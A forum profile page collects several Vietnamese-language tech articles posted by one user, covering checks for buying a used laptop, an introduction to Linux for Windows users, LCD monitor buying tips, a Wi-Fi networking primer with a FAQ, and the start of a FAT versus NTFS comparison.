banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: BigballVN  XML
Profile for BigballVN Messages posted by BigballVN [ number of posts not being displayed on this page: 0 ]
 

Bạn không đủ tiền mua một chiếc laptop "đập hộp" chính hãng, nhưng thực sự có nhu cầu dùng máy tính xách tay. Vậy laptop secondhand sẽ là giải pháp tối ưu nhất. Tuy nhiên, bạn cần rất thận trọng khi chọn mua máy cũ.

Bộ vi xử lý

Điểm đầu tiên cần chú ý khi mua laptop chính là bộ vi xử lý, bộ não của toàn bộ chiếc máy tính xách tay (MTXT). Hầu hết laptop ở thị trường Việt Nam và khu vực châu Á đều dùng bộ vi xử lý của Intel. Do đó, khi chọn mua máy, bạn cần yêu cầu thử kết nối Internet, tốt nhất là bằng cả hai đường có dây (LAN) và không dây (Wi-Fi). Khi đã kết nối được Internet, bạn chỉ cần vào website của Intel và download về máy tính chương trình tiện ích xác định model bộ xử lý Intel.



Phần mềm sẽ thông báo chi tiết về tốc độ và model bộ vi xử lý, tốc độ system bus, Cache Memory...



Sau khi cài đặt và chạy, phần mềm sẽ thông báo chính xác tốc độ và model của bộ xử lý đang sử dụng trên máy, tốc độ bus hệ thống (system bus) cũng như dung lượng và loại bộ nhớ cache (cache memory). Nếu bất kỳ thông số nào khác với những lời giới thiệu quảng cáo của người bán, hãy chuyển sang tìm chiếc máy khác, vì chương trình này của Intel phát hiện được tất cả mọi trường hợp tăng tốc độ hoặc "thay tên đổi họ" bộ xử lý.

Màn hình TFT

Sau chip xử lý, màn hình của laptop là bộ phận quan trọng thứ 2 cần kiểm tra. Đôi khi, bạn sẽ không thể nhìn thấy các lỗi chết điểm ảnh (dead pixel)

Các điểm ảnh chết sẽ không hiển thị được một số màu hoặc tất cả các màu.



trên màn hình nếu người bán cố tình dùng các hình nền tối màu hoặc nhiều chi tiết. Để kiểm tra, bạn có thể tải về phần mềm Dead Pixel Locator để hiển thị toàn bộ màn hình lần lượt bằng các màu khác nhau.

Có những điểm pixel của màn hình bị chết với tất cả các màu, nhưng cũng có điểm chỉ không hiển thị được một số màu. Do đó, Dead Pixel Locator sẽ giúp phát hiện tất cả những điểm ảnh bị "chết" trên màn hình LCD của laptop hoặc màn hình plasma. Chương trình không cần cài đặt và có thể chạy luôn, bạn chỉ cần bấm vào nút chọn màu và quan sát trên toàn bộ màn hình xem có xuất hiện những chấm màu khác thường nào hay không.

Khi phát hiện có bất kỳ điểm ảnh chết nào trên màn hình, tốt nhất bạn nên thử chọn chiếc khác, vì màn hình bị lỗi điểm ảnh thường đã qua sử dụng khá nhiều, sắp đến thời kỳ nhiều điểm ảnh cùng bị chết.

Hệ điều hành Windows XP

Hầu hết các máy laptop hiện đại đều sử dụng hệ điều hành Windows XP. Sẽ chẳng quan trọng gì mấy nếu bạn mua chiếc laptop đã "xập xệ". Nhưng nếu được quảng cáo là hàng mới dùng lướt, còn nguyên tem bảo hành, thì tốt nhất bạn nên thử check xem phiên bản Windows XP đó có bản quyền hay không tại địa chỉ HEre.



Nếu máy laptop đã cài lại Windows và không có bản quyền, điều đó cho thấy lịch sử của nó cũng có phần phức tạp, vì không còn đĩa cài Windows gốc có bản quyền, hay đã dùng nhiều, Windows bị lỗi, máy từng gặp sự cố .v.v.

Những kinh nghiệm đáng giá

Thường các hãng sản xuất laptop có thương hiệu nổi tiếng như IBM, HP, Sony, Toshiba... đều có cấu hình chuẩn cho mỗi model. Chỉ cần lật dưới đáy MTXT secondhand bạn định mua, tìm kiếm trên Google đúng mã số sản phẩm đó trên website của hãng sản xuất, bạn sẽ biết được cấu hình phần cứng của laptop đã bị thay đổi gì hay chưa.

Các hãng laptop nổi tiếng còn có những phần mềm chuyên dụng cho phép kiểm tra toàn bộ cấu hình máy có chính hãng hay không, kiểm tra chất lượng pin, thời gian đã sử dụng, thời gian dùng máy bằng nguồn pin.

Trực quan hơn, bạn có thể quan sát các góc máy hay cọ xát với túi và bàn tay (khi sử dụng) đã bị mòn sơn mạ chưa, có bị sơn tút lại hay không, các ốc vít có dấu hiệu từng bị tháo ra không. Một chi tiết khác có thể dễ quan sát là chân đế bằng cao su của MTXT. Người sử dụng thường có thói quen xê dịch vị trí laptop hơn là nhấc bổng lên để dịch chuyển. Do đó, nếu nhìn thấy chân đế cao su mòn vẹt, có thể xác định máy đã được sử dụng nhiều trong thời gian dài.

Ngoài ra, khi đi chọn mua laptop cũ, bạn cũng nên cầm theo một đĩa DVD hoặc VCD cũ đã xước để thử ổ DVD/VCD. Thời gian nhận ra đĩa nhanh thì có nghĩa ổ DVD vẫn còn tốt và ngược lại.

Sau cùng, khi đã chạy thử các chương trình đòi hỏi độ tương thích cấu hình tốt như xử lý ảnh dung lượng lớn trên PhotoShop hoặc bản vẽ AutoCad và thấy tốc độ ổn định, không bị giật, treo, bạn nên mở một chương trình soạn thảo văn bản như Word, sau đó gõ tất cả các phím trên bàn phím để đảm bảo không có vị trí phím nào bị liệt hoặc kém nhạy. Đây là những chi tiết rất dễ bị bỏ qua, nhưng lại ảnh hưởng rất nhiều tới hiệu quả sử dụng máy.
Hiện nay, Windows vẫn là hệ điều hành được sử dụng rộng rãi, đặc biệt là ở Việt Nam. Tuy nhiên, xu hướng sử dụng Linux cũng đang trở nên phổ biến mà nếu là một "IT Pro" thì chắc hẳn bạn cũng đã từng cài đặt và sử dụng Linux.

1. Cấu trúc thư mục

Cấu trúc thư mục không giống như trong Windows và các hệ điều hành khác, hệ thống tập tin trong Linux là một cây rất lớn (big tree). Thư mục Root ( / ) là thư mục gốc, các tập tin và các ổ đĩa khác chỉ là nhánh của Root.

Ví dụ: nếu bạn có 2 đĩa cứng a và b, một đĩa mềm và một ổ CD-ROM. Hãy giả sử rằng ổ đĩa thứ nhất có 2 phân vùng (partition) là a1 và a2, ổ đĩa thứ 2 chỉ có một phân vùng là b.

Trong Windows

ổ cứng a, phân vùng a1 (hda1): ổ đĩa C
ổ cứng a, phân vùng a2 (hda2): ổ đĩa D
ổ cứng b, một phân vùng b1 (hdb1): ổ đĩa E
ổ đĩa mềm: ổ A
ổ đĩa CD-ROM: ổ F
Ngược lại, trong Linux, mỗi ổ đĩa sẽ được gắn kết (mount) vào trong cây thư mục (Tree Directory) giống như là một thư mục bình thường:

hda1: / (Root)
hda2: /home
hdb1: /home/user/music
ổ đĩa mềm: /mnt/floppy
ổ CD-ROM: /mnt/cdrom
2. Hệ thống theo modul

Trong Windows 98/2000/XP hay Mac OS X... mỗi hệ điều hành đều có một giao diện đồ hoạ GUI không giống nhau.Trong Linux, mỗi modul trong hệ thống là hoàn toàn độc lập với nhau, vì vậy người sử dụng có thể trộn lẫn và tự tạo ra hệ điều hành cho riêng mình.

Không giống như hệ điều hành Windows của Microsoft, mọi thành phần đều kết nối và phụ thuộc lẫn nhau. Ngược lại, Linux lại cung cấp khả năng các chương trình làm việc độc lập với nhau, nếu chương trình này được gỡ bỏ thì các chương trình khác vẫn hoạt động tốt mà không gây ảnh hưởng gì. Chính vì khả năng phân chia modul như vậy mà HĐH Linux được phân phối bởi những người sử dụng hay các công ty lớn như RedHat, Xandros, Simply MEPIS và Suse... đều có thể tương thích với nhau.

Trong Linux, các chương trình cũng có thể thay đổi lẫn nhau, mà giao diện đồ hoạ GUI cũng không phải là ngoại lệ. Muốn có giao diện giống với Windows XP? Hãy sử dụng FVWM với theme XP. Muốn nhanh hơn? Hãy dùng IceWM. Muốn có đầy đủ tính năng? GNOME hoặc KDE sẽ là thích hợp nhất. Tất cả những gói phần mềm về giao diện GUI đều có những thuận lợi và yếu điểm riêng, nhưng chúng cũng đều hỗ trợ người dùng tương tác tốt với chuột.

3. Hỗ trợ phần cứng, phần mềm

Phần cứng, phần mềm và mọi thứ trong Linux cũng mới chỉ xuất hiện trong vài năm gần đây. Với thời gian chỉ bằng một nửa so với Windows, nhưng các phần mềm cho Linux mạnh mẽ hơn, ổn định hơn, "ngốn" ít tài nguyên hơn, và chi phí thì rẻ hơn so với nền tảng Windows.

Hỗ trợ phần mềm

Tuy nhiên, điều mà Linux cần phải quan tâm là hiện nay chưa có nhiều nhà cung cấp phần mềm hỗ trợ Linux. Ví dụ nếu muốn sử dụng QuickBook của Intuit trên Linux, thì không thể. Mặc dù, cũng có nhiều dự án cho phép các ứng dụng Windows có thể chạy trên Linux, như CrossOver Office (cho phép chạy Office trên Linux) và Wine (giả lập môi trường Windows và các ứng dụng Windows có thể chạy trên Linux). Nhưng các phần mềm này không thể chạy tốt và ổn định như trong môi trường thực của nó, người sử dụng cần phải chờ đợi khi các hãng cung cấp phần mềm chính thức chuyển sang Linux thì mới có thể sử dụng tốt được.

Hiện nay, cộng đồng mã nguồn mở đưa ra danh sách 15 000 chương trình hoạt động tốt trên Linux. Các phần mềm này đều miễn phí, chất lượng thì có thể khác nhau, nhưng hầu hết các chương trình đều viết rất tuyệt vời và có sự cải tiến đáng chú ý. Những phần mềm này có thể nhập và xuất các tập tin từ các định dạng của những phần mềm quen thuộc. Chẳng hạn, GNUCash có thể đọc các định dạng của QuickBook rất tốt, và OpenOffice.org có thể đọc tốt các định dạng tài liệu của bộ Micrsoft Office...

Hỗ trợ phần cứng

Để cài đặt phần cứng trên các máy tính Apple không đơn giản như trên Windows, và điều này cũng tương tự với Linux. Hầu hết các phần cứng ổ cứng, RAM, USB Flash, bo mạch chủ, card mạng và máy ảnh số đều làm việc tốt, nhưng một số phần cứng mới hoặc không được hỗ trợ thì rất khó cài đặt.

Các trình điều khiển làm việc với phần cứng được viết cho Linux đều phải được cung cấp miễn phí cho các cộng đồng người sử dụng Linux, mà điều này các hãng sản xuất phần cứng không muốn. Do đó, có thể đây là một điểm yếu so với Windows bởi các công ty phần cứng có thể làm việc trực tiếp với Microsoft về tính tương thích, và có xu hướng để Linux tự tìm cách hỗ trợ các thiết bị đó bởi họ muốn giữ bản quyền về công nghệ của riêng mình. Một thông tin tốt là các nhà cung cấp phần cứng cho Linux cũng như phần mềm đều đang có chuyển biến tích cực và nhiều công ty cũng đang dần hỗ trợ Linux.

Kết hợp giữa phần cứng, phần mềm trong các máy tính Linux là nhân hệ điều hành (kernel). Nhân hệ điều hành (HĐH) kết nối phần cứng và phần mềm, và những cập nhật mới nhất đều có sẵn trên Internet. Nếu đang sử dụng phần cứng mới và nhân HĐH cũ chưa hỗ trợ , hãy sử dụng phiên bản mới, đây cũng là một giải pháp sẽ giúp bạn vượt qua khó khăn. Để cài đặt nhân HĐH mới cũng không phải là quá phức tạp, tuy nhiên sử dụng trình quản lý các gói cài đặt sẽ đem lại sự đơn giản hơn.

4. Trình quản lý gói cài đặt

Thực ra có rất nhiều cách để cài đặt các chương trình Linux, nhưng cách dễ nhất là sử dụng trình quản lý cài đặt PM (Package Manager). PM đảm bảo chắc chắn rằng những tập tin bị mất đều được cài đặt lại và chương trình có thể chạy hoàn toàn chính xác, đúng yêu cầu.

Các hãng cung cấp Linux thường sử dụng các kho dữ liệu trực tuyến để lưu trữ các chương trình. Cài đặt các ứng dụng cũng dễ dàng, chỉ cần tìm kiếm các chương trình trong kho dữ liệu và nhấn chuột vào Install là xong. Không thể tìm IceWM hoặc MPlayer trong danh sách cài đặt? Cũng có những cách khác để cài đặt một khi dữ liệu cho những chương trình mà bạn không tìm thấy, hãy truy cập vào các kho dữ liệu trực tuyến như Synaptic cho Debian, Yum cho RedHat, YaST2 cho SuSE và Emerge cho Gentoo.

5. Quyền truy cập (Permission)

Linux được thiết kế cho nhiều người sử dụng, những người sử dụng này lại được chia thành nhiều nhóm. Mỗi người sử dụng đều có quyền đọc (Read), ghi (Write), hoạc thực thi (Execute) cho những tập tin của riêng họ, và quyền hạn để chuyển đổi quyền truy cập. Bởi Linux được thiết kế cho nhiều người sử dụng, mỗi người sử dụng đều có mật khẩu riêng, và giới hạn quyền truy cập của người sử dụng (User Permissions).

Một người dùng thuộc về một nhóm hoặc nhiều nhóm khác nhau, và mỗi người sử dụng có thể đặt quyền truy cập các tập tin/thư mục của họ có quyền đọc nhưng không thể ghi, hoặc kết hợp các R/W/X...

Người dùng quản trị root, cũng giống như Administrator trong Windows, có quyền truy cập vào tất cả những tập tin và chỉ những người sử dụng có quyền hạn mới được phép thay đổi những thiết lập hệ thống. Điều này giúp những người sử dụng thông thường không thể cài đặt những phần mềm gián điệp vào hệ thống và xoá những tập tin quan trọng.

6. Thư mục người dùng

Trong Windows có My Documents, nhưng bạn thường "quăng" những tài liệu ở chỗ nào? Rất nhiều người sử dụng lưu chúng ngay trên Desktop của Windows. Linux cũng có thể làm như vậy, nhưng mỗi người sử dụng đều cho một thư người dùng riêng, thường đặt tại /home/user. Trong thư mục người dùng bạn có thể lưu các tài liệu trong thư mục Documents (/home/user/documents), các liên kết tới chương trình, âm nhạc (/home/user/Music), hoặc bất cứ những gì nếu muốn. Bạn có thể tạo các tập tin hoặc các thư mục ở đó, tổ chức chúng theo cách mà mình thích.

7. Cài đặt mặc định

Sự khác biệt giữa các bản Linux từ các hãng phân phối như: các tập tin cũng được lưu vào các đường dẫn khác nhau và các ứng dụng cài đặt cho mỗi bản Linux cũng khác nhau... Nếu so sách các tập tin hệ thống giữa Redhat và SuSE cũng có sự khác biệt rất lớn. Hầu hết người sử dụng đều không cần phải biết nhiều tới sự khác biệt này, nhưng những nhà sản xuất phần mềm cần phải nhận biết rõ điều này. Vì vậy, khi nhờ sự giúp đỡ, hãy cho người khác biết rõ bạn đang sử dụng Linux từ nhà cung cấp nào. Nếu gặp không phải những rắc rối, và không quan tâm về sự khác biệt giữa những cài đặt mặc định này, bạn cứ yên tâm sử dụng, đó là cách tốt nhất để tránh "nhức đầu".

8 Giao diện dòng lệnh

Giao diện dòng lệnh trong Linux CLI (Command Line Interface), cũng giống như DOS của Windows. Nhưng khả năng của CLI lại mạnh mẽ và rất hữu ích khi giải quyết những sự cố máy tính. Nếu cần trợ giúp từ Internet hoặc hỏi ai đó, bạn có thể sử dụng giao diện dòng lênh để giúp bạn mà không cần phải nạp các trình quản lý GUI.

9.Tổ hợp Ctrl-Alt-Escape

Nhấn tổ hợp phím Ctrl-Alt-Escape, biểu tượng con trỏ chuột sẽ thay đổi hình dáng thành biểu tượng X, hoặc một biểu tượng nào đó. Trong chế độ này, chỉ cần nhấn vào cửa sổ chương trình bị lỗi hoặc treo, lập tức ứng dụng đó sẽ bị "giết". Tổ hợp phím này cũng tương tự như khi sử dụng Task Manager trong Windows. Khi đổi ý, bạn chỉ cần nhấn Esc để thoát khỏi chế độ này. Cũng giống sử dụng Task Manager của Windows, khi sử dụng sai, rất có thể những lỗi nghiêm trọng sẽ xảy ra và khởi động lại máy là không thể tránh khỏi.

10. Internet là người bạn thân

Sử dụng Linux cũng không hề đơn giản. Tuy nhiên, "không biết thì phải hỏi", rất nhiều câu hỏi được đưa ra trên các diễn đàn (Forum) về cách sử dụng Linux, và những câu trả lời, những mánh lới... đều có sẵn cho bạn. Một địa chỉ hấp dân mà bạn hãy ghé qua như: www.LinuxQuestions.org là một trang Web lớn cung cấp cho bạn một kho dữ liệu vô giá về Linux.

Lưu ý, trước khi đưa bất cứ một câu hỏi nào lên trang Web này hãy tìm kiếm các câu hỏi trong trang Web bởi rất có thể sẽ không phải đợi lâu, câu trả lời đã có sẵn ở đâu đó. Bạn cũng nên đọc qua những câu hỏi về một vấn đề hoặc một giải pháp khác nào đó, rất có thể chúng sẽ giúp ích cho vấn đề mà bạn đang gặp phải.

Màn hình máy tính tinh thể lỏng (LCD) không còn là một sản phẩm "xa xỉ" đối với người tiêu dùng Việt Nam. Chỉ với hơn 200 USD là bạn đã có một màn hình chất lượng tốt. Thị trường LCD Việt Nam đã có mặt hơn 10 nhãn hiệu của các nhà sản xuất trên thế giới.

Đó là các tên tuổi quen thuộc như Samsung, ViewSonic, LG, Sony, BenQ, TCL, Philips, Motorola, Syncmaster đến DigiLife, Notek, Microtek, Prolink...

Có nhiều sản phẩm LCD phù hợp cho từng đối tượng sử dụng cụ thể như gia đình, văn phòng hay trong những công việc thiết kế đồ họa. Theo các chuyên gia, khó có thể chỉ ra được sự khác biệt về chất lượng giữa các nhà sản xuất. Nhưng người tiêu dùng cần lưu ý đến một số điểm cơ bản khi chọn mua màn hình LCD. Đặc biệt cần lưu ý kiểm tra điểm chết (Dead pixel) trên màn hình. Đây là điều quan trọng nhất vì điểm chết là một điểm ảnh không có khả năng biểu diễn các màu sắc khác nhau. Nó trở nên đơn độc với một chấm sáng hoặc tối trên màn hình khiến người dùng thấy khó chịu. Có 2 loại điểm chết là điểm chết luôn sáng và điểm chết luôn tối.

Theo kỹ sư Vũ Trần Chí Tâm - Trưởng ban đánh giá thử nghiệm (Trung tâm tư vấn ITConnect), để kiểm tra điểm chết người dùng nên để hình nền (desktop) hoàn toàn màu đen để tìm được điểm chết luôn sáng (màu trắng) và ngược lại sẽ phát hiện được điểm chết luôn tối (màu đỏ). Theo tiêu chuẩn kỹ thuật, số điểm chết của một màn hình LCD nhỏ hơn 4 là mức cho phép của hầu hết các nhà sản xuất hiện nay. Điểm chết có thể xuất hiện ở màn hình hoàn toàn mới (do lỗi sản xuất) hoặc sau một thời gian sử dụng. Nếu điểm chết lớn hơn, người tiêu dùng sẽ được đổi màn hình mới trong thời gian bảo hành. Ngoài ra, tỷ lệ tương phản cũng là một điểm cần lưu ý vì tỷ lệ này càng cao sẽ khiến hình ảnh thể hiện trên màn hình LCD càng sắc nét.

Đối với các màn hình LCD hiện nay, độ phân giải tối thiểu phải là 300:1. Bên cạnh đó, các tiêu chuẩn về độ sáng, độ tương phản, góc nhìn càng rộng càng tốt (thông dụng là 120 độ ngang và 100 độ dọc), thời gian phản hồi nhanh (thấp hơn 25 mili giây), giao diện analog/digital, độ phân giải tối ưu... cũng cần được chú ý. Không nên chạm tay hay dùng các vật nhọn chạm vào màn hình; không nên lau chùi vùng hiển thị bằng chất tẩy rửa, tốt nhất là dùng bông gòn thấm ẩm lau nhẹ; không nên đặt màn hình ở vị trí có ánh nắng mặt trời chiếu trực tiếp; không nên đặt màn hình ở không gian hẹp. Khoảng cách từ màn hình đến các vật dụng bên cạnh ít nhất là 10 cm.
Mạng không dây không dùng cáp cho các kết nối, thay vào đó, chúng sử dụng sóng Radio, cũng tương tự như điện thoại không dây. Ưu thế của mạng không dây là khả năng di động và sự tự do, người dùng không bị hạn chế về không gian và vị trí kết nối. Những ưu điểm của mạng không dây bao gồm :

Khả năng di động và sự tự do – cho phép kết nối từ bất kỳ đâu.
Không bị hạn chế về không gian và vị trí kết nối.
Dễ lắp đặt và triển khai.
Không cần mua cáp.
Tiết kiệm thời gian lắp đặt cáp.
Dễ dàng mở rộng.

Mạng không dây hoạt động như thế nào

Một hệ thống mạng không dây đơn giản bao gồm hai hoặc nhiều hơn các máy tính đuợc kết nối với nhau nhằm mụch đích trao đổi dữ liệu và các tài nguyên khác. Mô hình đó cũng tương tự như một hệ thống điện thoại không dây bao gồm một trạm chính cùng với nhiều các điện thoại nhánh. Nối mạng không dây hiện đang được coi là một giải pháp rất thú vị bởi bạn sẽ không gặp nhiều trở ngại như khi dùng cáp và sẽ không mất nhiều thời gian khi có nhu cầu mở rộng.

Có hai loại mạng không dây cơ bản :

Kiểu Ad-hoc : Mỗi máy tính trong mạng giao tiếp trực tiếp với nhau thông qua các thiết bị Card mạng không dây mà không dùng đến các thiết bị định tuyến (Wireless Router) hay thu phát không dây (Wireless Access Point).

Kiểu Infrastructure : Các máy tính trong hệ thống mạng sử dụng một hoặc nhiều các thiết bị định tuyến hay thiết bị thu phát để thực hiện các hoạt động trao đổi dữ liệu với nhau và các hoạt động khác.

Vài nét về các điểm Hotspot

Hotspot là gì :

Hotspot là một địa điểm mà tại đó có cung cấp các dịch vụ kết nối không dây và dịch vụ truy cập Internet tốc độ cao, thông qua hoạt động của các thiết bị thu phát không dây (Wireless Access Point). Nếu bạn đang ở trong một điểm Hotspot và máy tính của bạn đã có trang bị sẵn Card mạng không dây, khi đó bạn hoàn toàn có thể tham gia vào hệ thống mạng ở đó và truy cập vào Internet. Số lượng các điểm Hotspot đang tăng nhanh theo thời gian và bây giờ bạn có thể dễ dàng tìm thấy chúng ở các khu vực như Nhà hàng, Quán Cafe, Sân bay…

Để tham gia vào một điểm Hotspot thì bạn cần có những gì :

Đơn giản bạn chỉ cần có máy tính hoặc máy PDA có trang bị tính năng không dây. Còn nếu máy tính hoặc máy PDA của bạn chưa có tính năng đó thì truớc hết bạn cần mua thêm các loại Card mạng không dây phù hợp để lắp vào chúng. Tại thời điểm này thì phần lớn các điểm Hotspot đều sử dụng các thiết bị thu phát không dây chuẩn B (hay 802.11b), tuy nhiên xu hướng chung trong thời gian sắp tới là các thiết bị loại này sẽ được thay thế bởi các thiết bị không dây chuẩn G nhằm đáp ứng 1 tốc độ cao hơn.

Làm thế nào để tìm thấy các điểm Hotspot :

Bạn có thể gọi điện trực tiếp đến các nhà cung cấp dịch vụ để hỏi thăm về địa chỉ cụ thể của các điểm Hotspot của họ, hoặc bạn cũng có thể truy cập vào Website : www.wifi-zone.org để tìm hiểu về các điểm Hotspot trên toàn thế giới.

Làm thế nào để tham gia vào một Hotspot :

Đối với các điểm Hotspot không thu phí, để tham gia vào đó bạn cần được cung cấp các thông tin về SSID của hệ thông mạng hay đơn giản là tên của hệ thống mạng. Còn đối với các điểm Hotspot thương mại, bạn cần thiết lập một Account trước khi tham gia lần đầu tiên, account này sẽ được cung cấp bởi những người chủ của điểm Hotspot đó.

Vấn đề bảo mật tại các điểm Hotspot :

Đối với các điểm Hotspot công cộng, vì mụch đích đơn giản hoá quá trình tham gia của người dùng nên hầu hết các tính năng bảo mật đều không được kích hoạt hoặc được dùng rất hạn chế, vì thế nếu bạn có nhu cầu sử dụng bảo mật tại những địa điểm này thì cần tìm hiểu xem điểm Hotspot mà bạn đang tham gia có hỗ trợ tính năng VPN Pass-through hay không ?

Các chuẩn của mạng không dây

Chuẩn 802.11b (Chuẩn cool.gif : các thiết bị thuộc chuẩn này hoạt động ở tần số 2.4GHz và có thể truyền dữ liệu với tốc độ tối đa 11Mbps trong phạm vi từ 100 feet đến 150 feet ( từ 35 mét đến 45 mét )

Chuẩn 802.11a (Chuẩn A) : các thiết bị thuộc chuẩn này hoạt động ở tần số 5GHz và có thể truyền dữ liệu với tốc độ tối đa 54Mbps nhưng chỉ trong phạm vi khoảng 75 feet ( khoảng 25 mét)

Chuẩn 802.11g (Chuẩn G) : Các thiết bị này hoạt động ở cùng tần số như các thiết bị chuẩn B, tuy nhiên chúng hỗ trợ tốc độ truyền dữ liệu nhanh gấp 5 lần so với chuẩn B với cùng một phạm vi phủ sóng. Các thiết bị chuẩn B và chuẩn G hoàn toàn tương thích với nhau, tuy nhiên cần lưu ý khi bạn trộn lẫn các thiết bị chuẩn B và chuẩn G với nhau thì các thiết bị sẽ hoạt động theo chuẩn nào có tốc độ thấp hơn.

Về tốc độ mạng

Tốc độ mạng liên quan đến việc các máy tính nối mạng có thể giao tiếp và trao đổi thông tin với nhau bao nhanh.

Các tốc độ của chuẩn không dây như 11 Mbps hay 54 Mbps không liên quan đến tốc độ kết nối hay tốc độ download, vì những tốc độ này được quyết định bởi Nhà cung cấp dịch vụ Internet.

Với 1 hệ thống mạng không dây, dữ liệu được gửi qua sóng Radio nên tốc độ có thể bị ảnh hưởng bởi các tác nhân gây nhiễu hoặc các vật thể lớn. Thiết bị định tuyến không dây sẽ tự động cảm nhận cường độ tín hiệu, nếu thấy tín hiệu yếu thì nó sẽ tự động điều chỉnh xuống các mức tốc độ truyền thấp hơn (Ví dụ như từ 11 Mbps sẽ giảm xuống còn 5.5 Mbps và 2Mbps hoặc thậm chí là 1 Mbps). Dưới đây là một số điều mà người dùng cần lưu ý khi triển khai một mạng không dây để có thể thu được hiệu quả cao nhất :

Nên đặt thiết bị Router không dây ở vị trí trung tâm của hệ thống mạng.
Lắp đặt sao cho các Antenna của Adapter không dây lắp cho máy tính Desktop hoặc Laptop hướng về phía Router không dây.
ránh đặt Antenna ở gần tường, trừ khi đó là chủ định của bạn, ngoài ra nếu bạn muốn duy trì kết nối ngay cả khi ở bên ngoài căn nhà thì nên lắp thiết bị Router không dây ở gần cửa sổ.
Trang bị thêm các thiết bị Antenna thu phát độc lập để mở rộng phạm vi phủ sóng.
Công nghệ Speedbooster và SRX

Trong phạm vi của chuẩn G (802.11g), Linksys đã phát triển thêm một số dòng sản phẩm mang lại cho nguời dùng sự cải thiện về tốc độ và khoảng cách. Tất cả các dòng sản phẩm này đều hoạt động tương thích với các thiết bị chuẩn B và chuẩn G.

Speedbooster : Tốc độ trao đổi dữ liệu tăng thêm 35% so với chuẩn G khi sử dụng với các thiết bị Speedbooster khác. Bạn sẽ thấy được sự khác biệt về tốc độ khi sử dụng chung với các thiết bị chuẩn G khác.

SRX : Nhanh hơn gấp 8 lần và phạm vi phủ sóng rộng hơn gấp 3 lần so với các thiết bị chuẩn G khi được sử dụng với các thiết bị SRX khác. SRX là viết tắt của các từ Speed (tốc độ) – Range (khoảng cách) và eXpansion (mở rộng), bên cạnh đó SRX sử dụng công nghệ MIMO theo đó thông qua một số lượng lớn các Antenna thu phát trên trạm chính và các Adapter thu phát để cải thiện tốc độ và khoảng cách thu phát.

SRX200 : Nhanh hơn gấp 6 lần và phạm vi phủ sóng rộng hơn gấp 2 lần so với chuẩn G. Các thiết bị của SRX200 hoàn toàn tương thích với các thiết bị chuẩn B, chuẩn G và SRX khác.

Chuẩn A+G (802.11a+g) : Các thiết bị thuộc chuẩn này hoạt động đồng thời trên cả hai tần số 2.4GHz và 5Ghz.

Các thiết bị cần thiết để triển khai một hệ thống mạng không dây

Kết nối Internet tốc độ cao.
Modem.
Wireless Router hoặc Access Point.
Wireless Network Adapter.
Các vấn đề cần lưu ý khi chọn mua các sản phẩm không dây

Trước hết cần xác định xem máy tính của bạn đã có Card mạng không dây chưa, hầu hết các máy tính Laptop thế hệ mới đều đã được tích hợp sẵn Card mạng không dây, trong khi các máy tính Desktop thì chưa có. Tiếp theo bạn cần xác định rõ nhu cầu nối mạng của bản thân, cụ thể :

Nếu bạn chỉ đơn giản muốn lướt Web và check email thì chỉ nên mua các thiết bị không dây chuẩn B.
Nếu bạn muốn chơi các trò Game trực tuyến hoặc làm việc với các files đa phương tiện có dung lượng lớn thì nên dùng chuẩn G, GS hoặc GX.
Các câu hỏi thường gặp và trả lời

1/Tôi có thể thực hiện các kết nối không dây và có dây trên cùng 1 Router đựơc không ?

Trả lời : Có. Thiết bị định tuyến không dây băng thông rộng của Linksys có tích hợp sẵn 4 cổng Ethernet và hỗ trợ tối đa 32 người dùng không dây truy cập cùng lúc.

2/Đâu là sự khác nhau giữa thiết bị thu phát không dây (Wireless Access Point) và thiết bị định tuyến không dây (Wireless Broadband Router) ?

Trả lời : Thiết bị thu phát không dây (Wireless Access Point) dùng để kết nối với Switch hoặc thiết bị định tuyến (Wireless Router) khác cho các truy cập không dây, còn thiết bị định tuyến không dây (Wireless Access Point) vừa bao gồm cả tính năng của một Access Point bên trong, mặt khác nó còn có khả năng định tuyến cho phép chia xẻ các kết nối băng thông rộng.

3/Làm thế nào để có thể giảm thiểu tình trạng nhiễu sóng gây ra khi sử dụng các thiết bị chuẩn B và G trong cùng 1 môi trường với các điện thoại không dây hoạt động tần số 2.4Ghz ?

Trả lời : Bạn có thể lựa chọn các cách sau đây :

· Thay đổi kênh truyền của điện thoại hoặc của thiết bị định tuyến không dây, để cho hai thiết bị sử dụng hai kênh truyền khác nhau.
· Thay đổi vị trí của thiết bị định tuyến không dây, sao cho nó cách xa thiết bị điện thoại.
· Trang bị 1 hệ thống điện thoại hoạt động ở tần số khác.

4/Router có thay thế cho Modem được không ?

Trả lời : Không. Thiết bị Router phải được kết nối với Modem Cable hoặc Modem ADSL.

5/Làm cách nào để trang bị thêm tính năng không dây cho hệ thống mạng có dây hiện tại ?

Trả lời : Bạn cần mua 1 thiết bị thu phát không dây và kết nối nó đến thiết bị Router hiện tại của bạn. Bênh cạnh đó bạn cần mua thêm các thiết bị Card mạng không dây thích hợp cho các máy tính trong hệ thống mạng.

6/Các thiết bị chuẩn 802.11a, 802.11b và 802.11g có thể làm việc với nhau không ?

Trả lời : Các thiết bị thuộc chuẩn 802.11a chỉ có thể làm việc với các thiết bị thuộc cùng chuẩn. Các thiết bị thuộc chuẩn 802.11b và 802.11g có thể làm việc với nhau vì hoạt động ở cùng tần số.
NTFS là hệ thống file tiên tiến hơn rất nhiều so với FAT32. Nó có đầy đủ các đặc tính của hệ thống file hiện đại và FAT32 không hề có. Bạn nên dùng NTFS để thay thế cho FAT32 vì các lý do sau...

Khái niệm về FAT và NTFS
FAT16: Với HĐH MS-DOS, hệ thống tập tin FAT (FAT16 – để phân biệt với FAT32) được công bố vào năm 1981 đưa ra một cách thức mới về việc tổ chức và quản lý tập tin trên đĩa cứng, đĩa mềm. Tuy nhiên, khi dung lượng đĩa cứng ngày càng tăng nhanh, FAT16 đã bộc lộ nhiều hạn chế. Với không gian địa chỉ 16 bit, FAT16 chỉ hỗ trợ đến 65.536 liên cung (clusters) trên một partition, gây ra sự lãng phí dung lượng đáng kể (đến 50% dung lượng đối với những ổ đĩa cứng trên 2 GB).

